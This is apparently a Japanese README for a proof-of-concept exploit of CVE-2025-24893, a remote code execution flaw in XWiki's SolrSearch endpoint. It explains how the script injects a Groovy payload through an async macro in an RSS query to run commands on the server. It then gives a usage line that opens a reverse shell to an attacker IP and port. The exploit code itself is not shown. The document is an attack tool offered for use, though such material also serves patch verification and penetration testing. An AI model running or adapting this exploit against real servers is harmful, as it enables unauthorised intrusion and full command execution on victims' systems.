
CVE-2025-24893用リバースシェルペイロード
CVE-2025-24893 の PoC – XWiki
<groovy>マクロリモートコード実行
Artemir のオリジナル PoC に触発されました
これは、脆弱なバージョンの XWiki におけるリモートコード実行 (RCE) 脆弱性である CVE-2025-24893 の Proof-of-Concept (PoC) エクスプロイトです。
この欠陥は、SolrSearch エンドポイント内でのユーザー入力の不適切なサニタイズにあり、RSS フィードクエリを介してサンドボックス化されていない <groovy> マクロインジェクションに対して脆弱です。
このスクリプトは、async マクロを使用して Groovy ペイロードを注入し、サーバー上でのコマンド実行 を引き起こします。これにより、攻撃者は自身のシステムにリバースシェルをトリガーすることができます。
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>